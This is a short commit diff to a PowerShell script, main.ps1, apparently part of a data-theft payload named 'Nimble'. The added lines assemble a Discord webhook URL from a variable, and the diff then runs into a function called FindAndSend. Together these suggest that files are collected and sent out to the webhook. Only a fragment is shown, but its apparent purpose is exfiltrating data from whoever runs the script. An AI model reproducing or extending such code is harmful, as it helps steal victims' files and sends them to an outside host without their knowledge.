Update main.ps1
This commit is contained in:
@@ -31,6 +31,9 @@ Nimble – Quick and light in movement or action.
|
||||
#>
|
||||
|
||||
$hookurl = "$dc"
|
||||
if ($hookurl.Length -lt 120){
|
||||
$hookurl = ("https://discord.com/api/webhooks/" + "$dc")
|
||||
}
|
||||
|
||||
Function FindAndSend {
|
||||
|
||||
|
||||
Reference in New Issue
Block a user